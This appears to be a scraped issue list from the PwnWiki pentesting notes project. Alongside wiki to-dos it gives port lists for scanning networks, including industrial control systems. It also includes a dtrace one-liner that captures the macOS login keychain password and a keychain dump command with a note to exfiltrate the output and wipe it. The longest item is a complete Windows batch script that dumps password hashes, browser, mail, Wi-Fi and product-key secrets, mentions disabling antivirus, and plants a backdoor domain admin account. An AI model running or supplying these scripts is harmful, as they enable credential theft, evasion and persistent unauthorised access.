pwnwiki / pwnwiki.github.io
PwnWiki - The notes section of the pentester's mind.
Home Page: http://pwnwiki.io
License: MIT License
Scrape the content from https://gist.github.com/willurd/5720255
Take the content in the https://github.com/pwnwiki/pwnwiki.github.io/blob/master/2besorted/gdoc_osx.md file and move it to the appropriate categories/files.
Grab info on reverse shells from http://highon.coffee/blog/reverse-shell-cheat-sheet/
Don't have time to add this in the appropriate place:
```sh
# Hook SecKeychainLogin inside loginwindow and print its string argument as the login
# keychain is unlocked (login / screen unlock). Needs root; from 10.11 on, SIP blocks
# dtrace from attaching to Apple-signed processes such as loginwindow.
sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(pgrep -x loginwindow)
```
(from https://twitter.com/fel1x/status/613420320104558592)
Dump the whole OS X keychain:
```sh
# -d dumps the secrets as well as the metadata; on a live session SecurityAgent raises an
# "Allow" dialog for every item, so this is noisy unless the keychain is already unlocked.
security dump-keychain -d login.keychain > keychain.txt
# read or exfil keychain.txt first, then wipe it (srm was removed in 10.12; use rm -P there)
srm keychain.txt
```
Source: https://twitter.com/pentestcli
The "easy copy" lines need to be something someone can copy-paste into any tool that accepts comma-separated ports (nmap/metasploit), covering all the ports listed in that category.
Intent: Try to create a series of lists for scanning during a pentest (internally or externally). First for just discovery, then for authenticated access, then for pwnage, and finally just for curiosity.
==========================
All further edits should be done via the wiki on Github.
Thanks for everyone's help and feedback!
==========================
Discovery Ports:
* easy copy - `21,22,23,25,79,80,88,110,111,139,143,389,443,445,514,515,631,1352,2049,3000,3389,4949,5060,5631,5632,5666,5900-5910,6000-6009,8000,8006,8080,8089,8443,8834,9080,9100,9443,17500`
* FTP: 21
* SSH: 22
* Telnet: 23
* SMTP: 25
* Finger: 79
* HTTP: 80
* Kerberos: 88
* POP3: 110
* SUNRPC (Unix RPC): 111 (think: rpcinfo)
* NetBIOS: 139
* IMAP: 143
* LDAP: 389
* HTTPS: 443
* Microsoft DS (SMB): 445
* RSH: 514
* Printers: 515 (LPD), 9100 (JetDirect raw)
* CUPS: 631
* LotusNotes: 1352
* NFS: 2049
* WEBrick (Ruby web server): 3000
* RDP: 3389
* Munin: 4949
* SIP: 5060
* PCAnywhere: 5631 (5632)
* NRPE (*nix) / NSClient++ (win): 5666 (evidence of a Nagios server on the network)
* VNC: 5900, 5901+ (same scheme as X11: +1 to the port number for each user/display over VNC. SPICE usually sits in this range as well)
* X11: 6000-6009 (+1 to the port number for each additional display) (see xspy, xwd, xkey for exploitation)
* Another HTTP: 8000 (Mezzanine in development mode, for example)
* Proxmox: 8006
* Alt-HTTP: 8080
* Splunk: 8089 (management port; web UI on 8000)
* Alt-HTTPS: 8443
* Nessus HTTPS: 8834
* Alt-HTTP Tomcat: 9080
* vSphere: 9443
* Dropbox LanSync: 17500
UDP Discovery:
* easy copy - `53,111,123,161,177,500,514,1194,1434,1900,17185`
* DNS: 53
* SUNRPC (Unix RPC): 111 (yeah, it's UDP, too)
* Network Time Protocol (NTP): 123
* SNMP: 161
* XDMCP: 177 (via NSE script --script broadcast-xdmcp-discover; discovers *nix boxes hosting X)
* ISAKMP/IKE: 500 (IKE aggressive-mode PSK attack, e.g. with ike-scan)
* syslog: 514
* OpenVPN: 1194
* MSSQL Ping: 1434
* UPnP (SSDP): 1900
* VxWorks WDB debug agent: 17185
Authentication Ports (other than ones already listed):
* easy copy - `902,1494,5985,5986,6129,8200,9084`
* VMware Server: 902, 8200, 9084
* Citrix: 1494
* WinRM: 80, 5985 (HTTP), 5986 (HTTPS)
* DameWare: 6129
Easy-win Ports:
* easy copy - `1098,1099,3299,3632,4848,6002,7002,8500,9060,10000,11211` (plus UDP `623`)
* IPMI: UDP/623 (RAKP hash retrieval for offline cracking, or cipher-0 auth bypass)
* Java RMI: 1099, 1098
* SAP Router: 3299
* DistCC: 3632
* GlassFish: 4848
* Sentinel License Monitor: 6002, 7002 (dir traversal, sometimes as SYSTEM)
* ColdFusion default stand-alone: 8500
* IBM WebSphere: 9060
* Webmin or BackupExec: 10000
* memcached: 11211
Database Ports:
* easy copy - `1433,1521-1527,1583,2100,3050,3306,3351,5000,5432,5433,8471,9471`
* MSSQL: 1433
* Oracle TNS Listener: 1521-1527
* Oracle XDB: 2100
* Firebird / InterBase: 3050
* MySQL: 3306
* PervasiveSQL: 3351, 1583
* Sybase: 5000
* PostgreSQL: 5432
* PostgreSQL second cluster (e.g. 9.2 installed alongside an older version): 5433
* DB2 / AS400: 8471, 9471
SCADA / ICS:
(source: http://www.digitalbond.com/tools/the-rack/control-system-port-list/ )
* easy copy - TCP `102,502,1089-1091,4000,4840,20000,34962-34964,44818`, UDP `1089-1091,2222,4000,20000,34962-34964,34980,44818,47808,55000-55003`
* BACnet/IP: UDP/47808
* DNP3: TCP/20000, UDP/20000
* EtherCAT: UDP/34980
* Ethernet/IP: TCP/44818, UDP/2222, UDP/44818
* FL-net: UDP/55000 to 55003
* Foundation Fieldbus HSE: TCP/1089 to 1091, UDP/1089 to 1091
* ICCP: TCP/102
* Modbus TCP: TCP/502
* OPC UA Binary: Vendor Application Specific
* OPC UA Discovery Server: TCP/4840
* OPC UA XML: TCP/80, TCP/443
* PROFINET: TCP/34962 to 34964, UDP/34962 to 34964
* ROC Plus: TCP/UDP 4000
Interesting Port Ranges:
* HTTP(S) Ports: 8000-9000
Web easy-win URLs: (moved to: https://etherpad.mozilla.org/weburl-easywins )
Top TCP ports by open-frequency from nmap's own nmap-services file (the third column is the observed open-frequency, so sort it numerically rather than lexically); swap `tcp` for `udp` for the UDP list:
```sh
# nmap --datadir shows the data directory if it is not /usr/share/nmap
awk '$2 ~ /\/tcp$/' /usr/share/nmap/nmap-services | sort -k3,3 -rn | head -n 1000 \
  | awk '{print $2}' | cut -d/ -f1 | paste -sd, -   # -> comma list for nmap -p
```
Content is here: http://resources.infosecinstitute.com/backdoor-sql-injection/
Move the content from the "cats" dir files (https://github.com/pwnwiki/pwnwiki.github.io/tree/master/2besorted/cats) into their appropriate categories.
I think we should have an entire page dedicated to netcat and the things you can do. I know that SANS (https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf) has one. I bet we can get a bunch of other content for it too.
Got the link for this from: http://synjunkie.blogspot.com/2008/03/basic-dos-foo.html
```batch
::start of file
@echo off
::create the dump directory plus a per-host subdirectory named after the machine, then move to the tools dir
if not exist \switchblade\dump md \switchblade\dump >nul
if not exist \switchblade\dump\%computername% md \switchblade\dump\%computername% >nul
cd \switchblade\tools\ >nul
::network info: everything ipconfig/route/netstat/netsh/net.exe can extract goes into <host>-net.log
::(netstat -b needs admin; netsh diag is XP-only; netsh firewall is superseded by netsh advfirewall on Vista+)
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
ipconfig /all >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
route print >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
ipconfig /displaydns >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
netstat -anbv >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
netsh diag show all /v >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
netsh firewall show conf >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
netsh firewall show port >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
arp -a >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
net session >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
::user and domain info: shares, local and domain groups, group policy, then logon-session hashes via whosthere/gsecdump
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net view >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net share >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net accounts >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net localgroup >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net localgroup /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net localgroup administrators /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net group "domain admins" /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net group "backup operators" /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
net group "domain users" /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
gpresult >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
.\whosthere.exe >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
.\whosthere-alt.exe >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
.\gsecdump.exe -a >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
::dump other PC info: running services, environment, full file tree
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
net start >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
set >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
tree /f >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
::slurp browser info: IE history via the vbs, Firefox saved passwords if Firefox is installed
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
cscript //nologo .\iehistquick.vbs >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" .\FirePassword.exe >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
echo **********[End Of File]*********** >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
::run fgdump hidden with the dump dir as its working directory, then the NirSoft tools writing HTML reports there;
::some of them are flagged as hacktools and will crash out of the script unless your AV killer ran first
nircmd.exe exec2 hide "\switchblade\dump\%computername%" "\switchblade\tools\fgdump.exe" -s -r -k
nircmd.exe execmd mylastsearch.exe /shtml "\switchblade\dump\~$sys.computername$\InternetSearch.html"
nircmd.exe execmd pspv.exe /shtml "\switchblade\dump\~$sys.computername$\IEPassword.html"
nircmd.exe execmd iepv.exe /shtml "\switchblade\dump\~$sys.computername$\IEProtected.html"
nircmd.exe execmd nk2view.exe /shtml "\switchblade\dump\~$sys.computername$\recentEmail.html"
nircmd.exe execmd recentfilesview.exe /shtml "\switchblade\dump\~$sys.computername$\recentfiles.html"
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" nircmd.exe execmd passwordfox.exe /shtml "\switchblade\dump\~$sys.computername$\FFPassword.html"
nircmd.exe execmd USBDeview.exe /shtml "\switchblade\dump\~$sys.computername$\USB.html"
nircmd.exe execmd mspassSLURP.exe /shtml "\switchblade\dump\~$sys.computername$\msn.html"
nircmd.exe execmd netpass.exe /shtml "\switchblade\dump\~$sys.computername$\netpassword.html"
nircmd.exe execmd iehv.exe /shtml "\switchblade\dump\~$sys.computername$\IEhistory.html"
nircmd.exe execmd ProduKey.exe /shtml "\switchblade\dump\~$sys.computername$\keys.html"
nircmd.exe execmd MozillaHistoryView.exe /shtml "\switchblade\dump\~$sys.computername$\FFXHistory.html"
nircmd.exe execmd WirelessKeyView.exe /shtml "\switchblade\dump\~$sys.computername$\Wireless.html"
nircmd.exe execmd mailpv.exe /shtml "\switchblade\dump\~$sys.computername$\mail.html"
nircmd.exe execmd mzcv.exe /shtml "\switchblade\dump\~$sys.computername$\FFXCookie.html"
nircmd.exe execmd cports.exe /shtml "\switchblade\dump\~$sys.computername$\OpenPorts.html"
nircmd.exe execmd chromepass.exe /shtml "\switchblade\dump\~$sys.computername$\ChromePass.html"
nircmd.exe execmd chromecacheview.exe /shtml "\switchblade\dump\~$sys.computername$\ChromeCache.html"
nircmd.exe execmd OpenedFilesView.exe /shtml "\switchblade\dump\~$sys.computername$\openfiles.html"
nircmd.exe execmd wul.exe /shtml "\switchblade\dump\~$sys.computername$\updates-bugfixes.html"
nircmd.exe execmd dialupass2.exe /shtml "\switchblade\dump\~$sys.computername$\DialUp2.html"
::finally, if we didn't get caught, leave a local admin (and attempt a domain admin) backdoor account
net user helpdeskadmin Password!@#$ /add
net localgroup Administrators helpdeskadmin /add
net group "domain admins" helpdeskadmin /add
exit
```
Now that scripts are allowed in the navigation.md, let's look at moving the show/hide code up to it.
Users may need to print out files from the pwnwiki site. HTML doesn't always play nice with print. Optimally there should be a button or something that a user could click to get a PDF generated from a pwnwiki page.
Also, this will help to move people from using the google documents as an authoritative source.
Just thought of this whilst going through "AT is the New Black", but do we actually have any decent documentation on Mimikatz and WCE? If not, it would be good to add some good documentation on these two tools to our post-exploitation for Windows section, as they tend to come in handy on a pentest.
Take the content in the https://github.com/pwnwiki/pwnwiki.github.io/blob/master/2besorted/gdoc_linux.md file and move it to the appropriate categories/files.
http://pwnwiki.io/#!presence/windows/network.md
lists `net group /domain` and `net localgroup /domain` as only working on a Windows Domain Controller. This is incorrect; it should probably say "only works on a Windows Domain".
Add https://isc.sans.edu/forums/diary/No+Wireshark+No+TCPDump+No+Problem/19409/ to the pwnwiki
Content from here: http://www.wordpress-secure.org/
The repo below is maintained by me. It collects all tweets of @wincmdfu:
https://github.com/madhuakula/wincmdfu
It contains many useful Windows exploitation, post-exploitation and other resources. Please let me know how I can add them to this repo.
Thanks,
Madhu Akula
This is the Google form that is advertised for people to submit their content to.